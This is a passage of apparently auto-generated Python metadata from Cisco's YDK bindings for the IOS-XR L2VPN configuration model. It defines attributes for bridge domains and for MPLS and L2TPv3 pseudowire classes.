_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
False,
[
_MetaInfoClassMember('routed-interface', REFERENCE_LIST, 'RoutedInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
[], [],
''' Bridge Domain Routed Interface
''',
'routed_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Name of the bridge domain
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-attachment-circuits', REFERENCE_CLASS, 'BdAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
[], [],
''' Attachment Circuit table
''',
'bd_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowire-evpns', REFERENCE_CLASS, 'BdPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
[], [],
''' List of EVPN pseudowires
''',
'bd_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowires', REFERENCE_CLASS, 'BdPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
[], [],
''' List of pseudowires
''',
'bd_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-storm-controls', REFERENCE_CLASS, 'BdStormControls' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
[], [],
''' Storm Control
''',
'bd_storm_controls',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-evis', REFERENCE_CLASS, 'BridgeDomainEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
[], [],
''' Bridge Domain EVI Table
''',
'bridge_domain_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mac', REFERENCE_CLASS, 'BridgeDomainMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
[], [],
''' MAC configuration commands
''',
'bridge_domain_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mtu', ATTRIBUTE, 'int' , None, None,
[('46', '65535')], [],
''' Maximum transmission unit for this Bridge
Domain
''',
'bridge_domain_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-pbb', REFERENCE_CLASS, 'BridgeDomainPbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
[], [],
''' Bridge Domain PBB
''',
'bridge_domain_pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('coupled-mode', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Coupled-mode configuration
''',
'coupled_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dai', REFERENCE_CLASS, 'Dai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
[], [],
''' Dynamic ARP Inspection
''',
'dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dhcp', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' DHCPv4 Snooping profile name
''',
'dhcp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable flooding
''',
'flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding-unknown-unicast', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Unknown Unicast flooding
''',
'flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach IGMP Snooping Profile Name
''',
'igmp_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable IGMP Snooping
''',
'igmp_snooping_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ip-source-guard', REFERENCE_CLASS, 'IpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
[], [],
''' IP Source Guard
''',
'ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('member-vnis', REFERENCE_CLASS, 'MemberVnis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
[], [],
''' Bridge Domain VxLAN Network Identifier
Table
''',
'member_vnis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mld-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach MLD Snooping Profile Name
''',
'mld_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nv-satellite', REFERENCE_CLASS, 'NvSatellite' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
[], [],
''' nV Satellite
''',
'nv_satellite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('routed-interfaces', REFERENCE_CLASS, 'RoutedInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
[], [],
''' Bridge Domain Routed Interface Table
''',
'routed_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown the Bridge Domain
''',
'shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'BridgeDomainTransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BridgeDomainTransportModeEnum',
[], [],
''' Bridge Domain Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfis', REFERENCE_CLASS, 'Vfis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
[], [],
''' Specify the virtual forwarding interface
name
''',
'vfis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
False,
[
_MetaInfoClassMember('bridge-domain', REFERENCE_LIST, 'BridgeDomain' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
[], [],
''' bridge domain
''',
'bridge_domain',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domains',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Bridge group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domains', REFERENCE_CLASS, 'BridgeDomains' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
[], [],
''' List of Bridge Domain
''',
'bridge_domains',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups',
False,
[
_MetaInfoClassMember('bridge-domain-group', REFERENCE_LIST, 'BridgeDomainGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
[], [],
''' Bridge group
''',
'bridge_domain_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'L2Tpv3SequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Tpv3SequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
False,
[
_MetaInfoClassMember('type-of-service-mode', REFERENCE_ENUM_CLASS, 'TypeOfServiceModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TypeOfServiceModeEnum',
[], [],
''' Type of service mode
''',
'type_of_service_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service-value', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Type of service value
''',
'type_of_service_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'type-of-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
False,
[
_MetaInfoClassMember('l2tpv3-class-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the L2TPv3 class name
''',
'l2tpv3_class_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('protocol', REFERENCE_ENUM_CLASS, 'L2TpSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpSignalingProtocolEnum',
[], [],
''' L2TPv3 signaling protocol
''',
'protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable path MTU
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('max-path-mtu', ATTRIBUTE, 'int' , None, None,
[('68', '65535')], [],
''' Maximum path maximum transmission unit
''',
'max_path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'path-mtu',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
False,
[
_MetaInfoClassMember('cookie-size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Cookie size
''',
'cookie_size',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('df-bit-set', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set the do not fragment bit to 1
''',
'df_bit_set',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2TPv3 encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('path-mtu', REFERENCE_CLASS, 'PathMtu' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
[], [],
''' Path maximum transmission unit
''',
'path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_CLASS, 'SignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
[], [],
''' L2TPv3 signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('time-to-live', ATTRIBUTE, 'int' , None, None,
[('1', '255')], [],
''' Time to live
''',
'time_to_live',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service', REFERENCE_CLASS, 'TypeOfService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
[], [],
''' Type of service
''',
'type_of_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tpv3-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
False,
[
_MetaInfoClassMember('disable-backup', ATTRIBUTE, 'int' , None, None,
[('0', '180')], [],
''' Disable backup delay
''',
'disable_backup',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BackupDisableEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BackupDisableEnum',
[], [],
''' Delay or Never
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-disable-delay',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'MplsSequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
False,
[
_MetaInfoClassMember('redundancy-initial-delay', ATTRIBUTE, 'int' , None, None,
[('0', '120')], [],
''' Initial delay before activating the
redundant PW, in seconds
''',
'redundancy_initial_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy-one-way', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force one-way PW redundancy behavior in
Redundancy Group
''',
'redundancy_one_way',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
False,
[
_MetaInfoClassMember('fallback-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Fallback disable
''',
'fallback_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-tunnel-number', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Interface Tunnel number for preferred path
''',
'interface_tunnel_number',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'PreferredPathEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PreferredPathEnum',
[], [],
''' Preferred Path Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'preferred-path',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
False,
[
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance-code', REFERENCE_ENUM_CLASS, 'FlowLabelTlvCodeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelTlvCodeEnum',
[], [],
''' Enable Legacy Flow Label TLV code
''',
'flow_label_load_balance_code',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-label-load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable PW Label based Load Balancing
''',
'pw_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'load-balance-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
False,
[
_MetaInfoClassMember('control-word', REFERENCE_ENUM_CLASS, 'ControlWordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ControlWordEnum',
[], [],
''' Enable control word
''',
'control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MPLS encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance-group', REFERENCE_CLASS, 'LoadBalanceGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
[], [],
''' Load Balancing
''',
'load_balance_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-redundancy', REFERENCE_CLASS, 'MplsRedundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
[], [],
''' Redundancy options for MPLS encapsulation
''',
'mpls_redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('preferred-path', REFERENCE_CLASS, 'PreferredPath' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
[], [],
''' Preferred path
''',
'preferred_path',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-switching-tlv', REFERENCE_ENUM_CLASS, 'PwSwitchingPointTlvEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PwSwitchingPointTlvEnum',
[], [],
''' Pseudowire Switching Point Tlv
''',
'pw_switching_tlv',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_ENUM_CLASS, 'MplsSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSignalingProtocolEnum',
[], [],
''' MPLS signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-tag-rewrite', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Static Tag rewrite
''',
'static_tag_rewrite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vccv-type', REFERENCE_ENUM_CLASS, 'VccvVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'VccvVerificationEnum',
[], [],
''' VCCV verification type
''',
'vccv_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
